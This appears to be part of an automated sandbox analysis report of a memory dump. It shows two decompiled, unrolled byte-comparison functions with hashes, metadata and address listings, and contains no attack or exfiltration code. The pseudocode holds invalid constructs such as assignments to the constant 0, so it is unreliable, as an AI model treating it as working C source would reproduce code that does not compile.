                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                            • Instruction ID: e63e8a81c225657b4e69614beffdd4fbcbfec59aed143588e75a52a2497e0bf9
                                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                            • Instruction Fuzzy Hash: 30C1C3762050970ADF2E463A857447FBBE16AA27B131A076DE8B3CB0D4FF20C569D620
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001B0548(void* __edx, void* __esi) {
                                                                            				signed int _t197;
                                                                            				signed char _t198;
                                                                            				signed char _t199;
                                                                            				signed char _t200;
                                                                            				signed char _t202;
                                                                            				signed char _t203;
                                                                            				signed int _t246;
                                                                            				void* _t294;
                                                                            				void* _t297;
                                                                            				void* _t299;
                                                                            				void* _t301;
                                                                            				void* _t303;
                                                                            				void* _t305;
                                                                            				void* _t307;
                                                                            				void* _t309;
                                                                            				void* _t311;
                                                                            				void* _t313;
                                                                            				void* _t315;
                                                                            				void* _t317;
                                                                            				void* _t319;
                                                                            				void* _t321;
                                                                            				void* _t323;
                                                                            				void* _t325;
                                                                            				void* _t327;
                                                                            				void* _t329;
                                                                            				void* _t331;
                                                                            				void* _t333;
                                                                            				void* _t335;
                                                                            				void* _t336;
                                                                            
                                                                            				_t336 = __esi;
                                                                            				_t294 = __edx;
                                                                            				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
                                                                            					_t246 = 0;
                                                                            					L14:
                                                                            					if(_t246 != 0) {
                                                                            						goto L1;
                                                                            					}
                                                                            					_t198 =  *(_t336 - 0x1b);
                                                                            					if(_t198 ==  *(_t294 - 0x1b)) {
                                                                            						_t246 = 0;
                                                                            						L25:
                                                                            						if(_t246 != 0) {
                                                                            							goto L1;
                                                                            						}
                                                                            						_t199 =  *(_t336 - 0x17);
                                                                            						if(_t199 ==  *(_t294 - 0x17)) {
                                                                            							_t246 = 0;
                                                                            							L36:
                                                                            							if(_t246 != 0) {
                                                                            								goto L1;
                                                                            							}
                                                                            							_t200 =  *(_t336 - 0x13);
                                                                            							if(_t200 ==  *(_t294 - 0x13)) {
                                                                            								_t246 = 0;
                                                                            								L47:
                                                                            								if(_t246 != 0) {
                                                                            									goto L1;
                                                                            								}
                                                                            								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
                                                                            									_t246 = 0;
                                                                            									L58:
                                                                            									if(_t246 != 0) {
                                                                            										goto L1;
                                                                            									}
                                                                            									_t202 =  *(_t336 - 0xb);
                                                                            									if(_t202 ==  *(_t294 - 0xb)) {
                                                                            										_t246 = 0;
                                                                            										L69:
                                                                            										if(_t246 != 0) {
                                                                            											goto L1;
                                                                            										}
                                                                            										_t203 =  *(_t336 - 7);
                                                                            										if(_t203 ==  *(_t294 - 7)) {
                                                                            											_t246 = 0;
                                                                            											L80:
                                                                            											if(_t246 != 0) {
                                                                            												goto L1;
                                                                            											}
                                                                            											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
                                                                            											if(_t297 == 0) {
                                                                            												L83:
                                                                            												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
                                                                            												if(_t299 == 0) {
                                                                            													L3:
                                                                            													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
                                                                            													if(_t246 != 0) {
                                                                            														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                            													}
                                                                            													goto L1;
                                                                            												}
                                                                            												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
                                                                            												if(_t246 != 0) {
                                                                            													goto L1;
                                                                            												} else {
                                                                            													goto L3;
                                                                            												}
                                                                            											}
                                                                            											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
                                                                            											if(_t246 != 0) {
                                                                            												goto L1;
                                                                            											}
                                                                            											goto L83;
                                                                            										}
                                                                            										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
                                                                            										if(_t301 == 0) {
                                                                            											L73:
                                                                            											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
                                                                            											if(_t303 == 0) {
                                                                            												L75:
                                                                            												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
                                                                            												if(_t305 == 0) {
                                                                            													L77:
                                                                            													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
                                                                            													if(_t246 != 0) {
                                                                            														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                            													}
                                                                            													goto L80;
                                                                            												}
                                                                            												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
                                                                            												if(_t246 != 0) {
                                                                            													goto L1;
                                                                            												}
                                                                            												goto L77;
                                                                            											}
                                                                            											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
                                                                            											if(_t246 != 0) {
                                                                            												goto L1;
                                                                            											}
                                                                            											goto L75;
                                                                            										}
                                                                            										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
                                                                            										if(_t246 != 0) {
                                                                            											goto L1;
                                                                            										}
                                                                            										goto L73;
                                                                            									}
                                                                            									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
                                                                            									if(_t307 == 0) {
                                                                            										L62:
                                                                            										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
                                                                            										if(_t309 == 0) {
                                                                            											L64:
                                                                            											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
                                                                            											if(_t311 == 0) {
                                                                            												L66:
                                                                            												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
                                                                            												if(_t246 != 0) {
                                                                            													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                            												}
                                                                            												goto L69;
                                                                            											}
                                                                            											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
                                                                            											if(_t246 != 0) {
                                                                            												goto L1;
                                                                            											}
                                                                            											goto L66;
                                                                            										}
                                                                            										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
                                                                            										if(_t246 != 0) {
                                                                            											goto L1;
                                                                            										}
                                                                            										goto L64;
                                                                            									}
                                                                            									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
                                                                            									if(_t246 != 0) {
                                                                            										goto L1;
                                                                            									}
                                                                            									goto L62;
                                                                            								}
                                                                            								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
                                                                            								if(_t313 == 0) {
                                                                            									L51:
                                                                            									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
                                                                            									if(_t315 == 0) {
                                                                            										L53:
                                                                            										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
                                                                            										if(_t317 == 0) {
                                                                            											L55:
                                                                            											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
                                                                            											if(_t246 != 0) {
                                                                            												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                            											}
                                                                            											goto L58;
                                                                            										}
                                                                            										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
                                                                            										if(_t246 != 0) {
                                                                            											goto L1;
                                                                            										}
                                                                            										goto L55;
                                                                            									}
                                                                            									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
                                                                            									if(_t246 != 0) {
                                                                            										goto L1;
                                                                            									}
                                                                            									goto L53;
                                                                            								}
                                                                            								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
                                                                            								if(_t246 != 0) {
                                                                            									goto L1;
                                                                            								}
                                                                            								goto L51;
                                                                            							}
                                                                            							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
                                                                            							if(_t319 == 0) {
                                                                            								L40:
                                                                            								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
                                                                            								if(_t321 == 0) {
                                                                            									L42:
                                                                            									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
                                                                            									if(_t323 == 0) {
                                                                            										L44:
                                                                            										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
                                                                            										if(_t246 != 0) {
                                                                            											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                            										}
                                                                            										goto L47;
                                                                            									}
                                                                            									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
                                                                            									if(_t246 != 0) {
                                                                            										goto L1;
                                                                            									}
                                                                            									goto L44;
                                                                            								}
                                                                            								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
                                                                            								if(_t246 != 0) {
                                                                            									goto L1;
                                                                            								}
                                                                            								goto L42;
                                                                            							}
                                                                            							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
                                                                            							if(_t246 != 0) {
                                                                            								goto L1;
                                                                            							}
                                                                            							goto L40;
                                                                            						}
                                                                            						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
                                                                            						if(_t325 == 0) {
                                                                            							L29:
                                                                            							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
                                                                            							if(_t327 == 0) {
                                                                            								L31:
                                                                            								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
                                                                            								if(_t329 == 0) {
                                                                            									L33:
                                                                            									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
                                                                            									if(_t246 != 0) {
                                                                            										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                            									}
                                                                            									goto L36;
                                                                            								}
                                                                            								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
                                                                            								if(_t246 != 0) {
                                                                            									goto L1;
                                                                            								}
                                                                            								goto L33;
                                                                            							}
                                                                            							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
                                                                            							if(_t246 != 0) {
                                                                            								goto L1;
                                                                            							}
                                                                            							goto L31;
                                                                            						}
                                                                            						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
                                                                            						if(_t246 != 0) {
                                                                            							goto L1;
                                                                            						}
                                                                            						goto L29;
                                                                            					}
                                                                            					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
                                                                            					if(_t331 == 0) {
                                                                            						L18:
                                                                            						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
                                                                            						if(_t333 == 0) {
                                                                            							L20:
                                                                            							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
                                                                            							if(_t335 == 0) {
                                                                            								L22:
                                                                            								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
                                                                            								if(_t246 != 0) {
                                                                            									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                            								}
                                                                            								goto L25;
                                                                            							}
                                                                            							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
                                                                            							if(_t246 != 0) {
                                                                            								goto L1;
                                                                            							}
                                                                            							goto L22;
                                                                            						}
                                                                            						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
                                                                            						if(_t246 != 0) {
                                                                            							goto L1;
                                                                            						}
                                                                            						goto L20;
                                                                            					}
                                                                            					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
                                                                            					if(_t246 != 0) {
                                                                            						goto L1;
                                                                            					}
                                                                            					goto L18;
                                                                            				} else {
                                                                            					__edi =  *(__esi - 0x1f) & 0x000000ff;
                                                                            					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
                                                                            					if(__edi == 0) {
                                                                            						L7:
                                                                            						__edi =  *(__esi - 0x1e) & 0x000000ff;
                                                                            						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                                                            						if(__edi == 0) {
                                                                            							L9:
                                                                            							__edi =  *(__esi - 0x1d) & 0x000000ff;
                                                                            							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                                            							if(__edi == 0) {
                                                                            								L11:
                                                                            								__ecx =  *(__esi - 0x1c) & 0x000000ff;
                                                                            								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                                            								if(__ecx != 0) {
                                                                            									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                                            								}
                                                                            								goto L14;
                                                                            							}
                                                                            							0 = 0 | __edi > 0x00000000;
                                                                            							__ecx = (__edi > 0) * 2 != 1;
                                                                            							if((__edi > 0) * 2 != 1) {
                                                                            								goto L1;
                                                                            							}
                                                                            							goto L11;
                                                                            						}
                                                                            						0 = 0 | __edi > 0x00000000;
                                                                            						__ecx = (__edi > 0) * 2 != 1;
                                                                            						if((__edi > 0) * 2 != 1) {
                                                                            							goto L1;
                                                                            						}
                                                                            						goto L9;
                                                                            					}
                                                                            					0 = 0 | __edi > 0x00000000;
                                                                            					__ecx = (__edi > 0) * 2 != 1;
                                                                            					if((__edi > 0) * 2 != 1) {
                                                                            						goto L1;
                                                                            					}
                                                                            					goto L7;
                                                                            				}
                                                                            				L1:
                                                                            				_t197 = _t246;
                                                                            				return _t197;
                                                                            			}
































                                                                            0x001b06c0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b06c0
                                                                            0x001b0695
                                                                            0x001b069e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b069e
                                                                            0x001b05f3
                                                                            0x001b05f5
                                                                            0x001b060d
                                                                            0x001b0615
                                                                            0x001b0617
                                                                            0x001b062f
                                                                            0x001b0637
                                                                            0x001b0639
                                                                            0x001b0651
                                                                            0x001b0659
                                                                            0x001b065b
                                                                            0x001b0664
                                                                            0x001b0664
                                                                            0x00000000
                                                                            0x001b065b
                                                                            0x001b0642
                                                                            0x001b064b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b064b
                                                                            0x001b0620
                                                                            0x001b0629
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b0629
                                                                            0x001b05fe
                                                                            0x001b0607
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b0554
                                                                            0x001b0558
                                                                            0x001b055c
                                                                            0x001b055e
                                                                            0x001b0576
                                                                            0x001b0576
                                                                            0x001b057e
                                                                            0x001b0580
                                                                            0x001b0598
                                                                            0x001b0598
                                                                            0x001b05a0
                                                                            0x001b05a2
                                                                            0x001b05ba
                                                                            0x001b05ba
                                                                            0x001b05c2
                                                                            0x001b05c4
                                                                            0x001b05cd
                                                                            0x001b05cd
                                                                            0x00000000
                                                                            0x001b05c4
                                                                            0x001b05a8
                                                                            0x001b05ab
                                                                            0x001b05b4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b05b4
                                                                            0x001b0586
                                                                            0x001b0589
                                                                            0x001b0592
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b0592
                                                                            0x001b0564
                                                                            0x001b0567
                                                                            0x001b0570
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b0570
                                                                            0x001afcd6
                                                                            0x001afcd6
                                                                            0x001b0ac7

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                            • Instruction ID: aa3aa7a285b6d89873801956c610c6dfc9d18e776636feb53d94ead1e243761e
                                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                            • Instruction Fuzzy Hash: C9C1C4762051970ADF2E463AC57447FFBA16EA27B131A076DE8B2CB0D4FF20C529D620
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001AFCDE(void* __edx, void* __esi) {
                                                                            				signed int _t184;
                                                                            				signed char _t185;
                                                                            				signed char _t186;
                                                                            				signed char _t187;
                                                                            				signed char _t188;
                                                                            				signed char _t190;
                                                                            				signed int _t231;
                                                                            				void* _t275;
                                                                            				void* _t278;
                                                                            				void* _t280;
                                                                            				void* _t282;
                                                                            				void* _t284;
                                                                            				void* _t286;
                                                                            				void* _t288;
                                                                            				void* _t290;
                                                                            				void* _t292;
                                                                            				void* _t294;
                                                                            				void* _t296;
                                                                            				void* _t298;
                                                                            				void* _t300;
                                                                            				void* _t302;
                                                                            				void* _t304;
                                                                            				void* _t306;
                                                                            				void* _t308;
                                                                            				void* _t310;
                                                                            				void* _t312;
                                                                            				void* _t313;
                                                                            
                                                                            				_t313 = __esi;
                                                                            				_t275 = __edx;
                                                                            				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
                                                                            					_t231 = 0;
                                                                            					L11:
                                                                            					if(_t231 != 0) {
                                                                            						goto L1;
                                                                            					}
                                                                            					_t185 =  *(_t313 - 0x19);
                                                                            					if(_t185 ==  *(_t275 - 0x19)) {
                                                                            						_t231 = 0;
                                                                            						L22:
                                                                            						if(_t231 != 0) {
                                                                            							goto L1;
                                                                            						}
                                                                            						_t186 =  *(_t313 - 0x15);
                                                                            						if(_t186 ==  *(_t275 - 0x15)) {
                                                                            							_t231 = 0;
                                                                            							L33:
                                                                            							if(_t231 != 0) {
                                                                            								goto L1;
                                                                            							}
                                                                            							_t187 =  *(_t313 - 0x11);
                                                                            							if(_t187 ==  *(_t275 - 0x11)) {
                                                                            								_t231 = 0;
                                                                            								L44:
                                                                            								if(_t231 != 0) {
                                                                            									goto L1;
                                                                            								}
                                                                            								_t188 =  *(_t313 - 0xd);
                                                                            								if(_t188 ==  *(_t275 - 0xd)) {
                                                                            									_t231 = 0;
                                                                            									L55:
                                                                            									if(_t231 != 0) {
                                                                            										goto L1;
                                                                            									}
                                                                            									if( *(_t313 - 9) ==  *(_t275 - 9)) {
                                                                            										_t231 = 0;
                                                                            										L66:
                                                                            										if(_t231 != 0) {
                                                                            											goto L1;
                                                                            										}
                                                                            										_t190 =  *(_t313 - 5);
                                                                            										if(_t190 ==  *(_t275 - 5)) {
                                                                            											_t231 = 0;
                                                                            											L77:
                                                                            											if(_t231 == 0) {
                                                                            												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
                                                                            												if(_t231 != 0) {
                                                                            													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                            												}
                                                                            											}
                                                                            											goto L1;
                                                                            										}
                                                                            										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
                                                                            										if(_t278 == 0) {
                                                                            											L70:
                                                                            											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
                                                                            											if(_t280 == 0) {
                                                                            												L72:
                                                                            												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
                                                                            												if(_t282 == 0) {
                                                                            													L74:
                                                                            													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
                                                                            													if(_t231 != 0) {
                                                                            														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                            													}
                                                                            													goto L77;
                                                                            												}
                                                                            												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
                                                                            												if(_t231 != 0) {
                                                                            													goto L1;
                                                                            												}
                                                                            												goto L74;
                                                                            											}
                                                                            											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
                                                                            											if(_t231 != 0) {
                                                                            												goto L1;
                                                                            											}
                                                                            											goto L72;
                                                                            										}
                                                                            										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
                                                                            										if(_t231 != 0) {
                                                                            											goto L1;
                                                                            										}
                                                                            										goto L70;
                                                                            									}
                                                                            									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
                                                                            									if(_t284 == 0) {
                                                                            										L59:
                                                                            										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
                                                                            										if(_t286 == 0) {
                                                                            											L61:
                                                                            											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
                                                                            											if(_t288 == 0) {
                                                                            												L63:
                                                                            												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
                                                                            												if(_t231 != 0) {
                                                                            													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                            												}
                                                                            												goto L66;
                                                                            											}
                                                                            											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
                                                                            											if(_t231 != 0) {
                                                                            												goto L1;
                                                                            											}
                                                                            											goto L63;
                                                                            										}
                                                                            										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
                                                                            										if(_t231 != 0) {
                                                                            											goto L1;
                                                                            										}
                                                                            										goto L61;
                                                                            									}
                                                                            									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
                                                                            									if(_t231 != 0) {
                                                                            										goto L1;
                                                                            									}
                                                                            									goto L59;
                                                                            								}
                                                                            								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
                                                                            								if(_t290 == 0) {
                                                                            									L48:
                                                                            									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
                                                                            									if(_t292 == 0) {
                                                                            										L50:
                                                                            										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
                                                                            										if(_t294 == 0) {
                                                                            											L52:
                                                                            											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
                                                                            											if(_t231 != 0) {
                                                                            												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                            											}
                                                                            											goto L55;
                                                                            										}
                                                                            										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
                                                                            										if(_t231 != 0) {
                                                                            											goto L1;
                                                                            										}
                                                                            										goto L52;
                                                                            									}
                                                                            									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
                                                                            									if(_t231 != 0) {
                                                                            										goto L1;
                                                                            									}
                                                                            									goto L50;
                                                                            								}
                                                                            								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
                                                                            								if(_t231 != 0) {
                                                                            									goto L1;
                                                                            								}
                                                                            								goto L48;
                                                                            							}
                                                                            							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
                                                                            							if(_t296 == 0) {
                                                                            								L37:
                                                                            								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
                                                                            								if(_t298 == 0) {
                                                                            									L39:
                                                                            									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
                                                                            									if(_t300 == 0) {
                                                                            										L41:
                                                                            										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
                                                                            										if(_t231 != 0) {
                                                                            											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                            										}
                                                                            										goto L44;
                                                                            									}
                                                                            									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
                                                                            									if(_t231 != 0) {
                                                                            										goto L1;
                                                                            									}
                                                                            									goto L41;
                                                                            								}
                                                                            								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
                                                                            								if(_t231 != 0) {
                                                                            									goto L1;
                                                                            								}
                                                                            								goto L39;
                                                                            							}
                                                                            							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
                                                                            							if(_t231 != 0) {
                                                                            								goto L1;
                                                                            							}
                                                                            							goto L37;
                                                                            						}
                                                                            						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
                                                                            						if(_t302 == 0) {
                                                                            							L26:
                                                                            							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
                                                                            							if(_t304 == 0) {
                                                                            								L28:
                                                                            								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
                                                                            								if(_t306 == 0) {
                                                                            									L30:
                                                                            									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
                                                                            									if(_t231 != 0) {
                                                                            										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                            									}
                                                                            									goto L33;
                                                                            								}
                                                                            								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
                                                                            								if(_t231 != 0) {
                                                                            									goto L1;
                                                                            								}
                                                                            								goto L30;
                                                                            							}
                                                                            							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
                                                                            							if(_t231 != 0) {
                                                                            								goto L1;
                                                                            							}
                                                                            							goto L28;
                                                                            						}
                                                                            						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
                                                                            						if(_t231 != 0) {
                                                                            							goto L1;
                                                                            						}
                                                                            						goto L26;
                                                                            					}
                                                                            					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
                                                                            					if(_t308 == 0) {
                                                                            						L15:
                                                                            						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
                                                                            						if(_t310 == 0) {
                                                                            							L17:
                                                                            							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
                                                                            							if(_t312 == 0) {
                                                                            								L19:
                                                                            								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
                                                                            								if(_t231 != 0) {
                                                                            									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                            								}
                                                                            								goto L22;
                                                                            							}
                                                                            							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
                                                                            							if(_t231 != 0) {
                                                                            								goto L1;
                                                                            							}
                                                                            							goto L19;
                                                                            						}
                                                                            						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
                                                                            						if(_t231 != 0) {
                                                                            							goto L1;
                                                                            						}
                                                                            						goto L17;
                                                                            					}
                                                                            					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
                                                                            					if(_t231 != 0) {
                                                                            						goto L1;
                                                                            					}
                                                                            					goto L15;
                                                                            				} else {
                                                                            					__edi = __al & 0x000000ff;
                                                                            					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                                            					if(__edi == 0) {
                                                                            						L4:
                                                                            						__edi =  *(__esi - 0x1c) & 0x000000ff;
                                                                            						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                                            						if(__edi == 0) {
                                                                            							L6:
                                                                            							__edi =  *(__esi - 0x1b) & 0x000000ff;
                                                                            							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                                                            							if(__edi == 0) {
                                                                            								L8:
                                                                            								__ecx =  *(__esi - 0x1a) & 0x000000ff;
                                                                            								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                                                                            								if(__ecx != 0) {
                                                                            									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                                            								}
                                                                            								goto L11;
                                                                            							}
